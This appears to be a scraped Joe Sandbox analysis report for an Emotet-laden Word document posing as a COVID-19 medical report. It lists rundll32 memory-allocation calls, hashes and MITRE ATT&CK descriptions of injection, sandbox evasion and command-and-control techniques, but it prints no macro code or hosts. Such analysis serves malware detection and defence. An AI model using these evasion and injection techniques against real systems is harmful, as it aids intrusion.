VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019F5D4

Strings

VirtualAlloc, xrefs: 0019F5B9, 0019F5BC

Memory Dump Source

Source File: 0000000A.00000002.2145212500.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_180000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: c0cf902db63e4ed20e9f4f74eb259fd0881dba2f6be514e3d5abf6831e0be3b3
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: F9113060D08289EEEF01D7E884097EEBFB55B21708F044098E5446A282D3BA5759CBA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2460 Parent PID: 2844 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	13
Total number of Limit Nodes:	1

Executed Functions

Function 001CFB30, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001CFB75
UnmapViewOfFile.KERNELBASE(?), ref: 001CFC25
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001CFC3F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 001CFD70

Memory Dump Source

Source File: 0000000B.00000002.2155695050.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1b0000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 45f389ec2aa4e51a2fc57f289db33ff4fa75fe6bb965d181c0219365a9862601
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 45B1AAB5A00109DFCB48CF84C590EAEB7B6BF98314F208159E919AB355D735EE82CB94

Uniqueness

Uniqueness Score: -1.00%

Function 001CF550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001CF5D4

Strings

VirtualAlloc, xrefs: 001CF5B9, 001CF5BC

Memory Dump Source

Source File: 0000000B.00000002.2155695050.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1b0000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 27437ec5208aa4086a4bf65c4afb43b2448d1d2896a45ea183c8e927ae75f31f
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: C61133A0D082C9EEEF01D7E88405BEEBFB55B21704F044098E5446A282D3BA5759C7A6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2448 Parent PID: 2460 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	13
Total number of Limit Nodes:	1

Executed Functions

Function 0011FB30, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0011FB75
UnmapViewOfFile.KERNEL32(?), ref: 0011FC25
VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 0011FC3F
VirtualProtect.KERNEL32(?,?,00000000), ref: 0011FD70

Memory Dump Source

Source File: 0000000C.00000002.2334190551.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_100000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 9fe7a9c9977b04f471e3bb1298656e988cb35bb49ba124f09ec1847d69351979
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: BDB1BAB5A00109DFCB48CF84D590EAEB7B5BF88304F208169E919AB345D735EE82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0011F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0011F5D4

Strings

VirtualAlloc, xrefs: 0011F5B9, 0011F5BC

Memory Dump Source

Source File: 0000000C.00000002.2334190551.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_100000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: e55c7decea02c9643cacb10e250befe015d009d3d3098331e5d237864bb570b0
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: C2113360D0828DEEEB01D7E884057EEBFB55B21704F0440A8E5486A282D3BA5759C7A6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report IU-8549 Medical report COVID-19.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "IU-8549 Medical report COVID-19.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Dulz0g2a3qqdjsty7, Stream Size: 25190

General

VBA Code Keywords

VBA Code

VBA File Name: Hj8dhqrdh_8498, Stream Size: 701

General

VBA Code Keywords

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre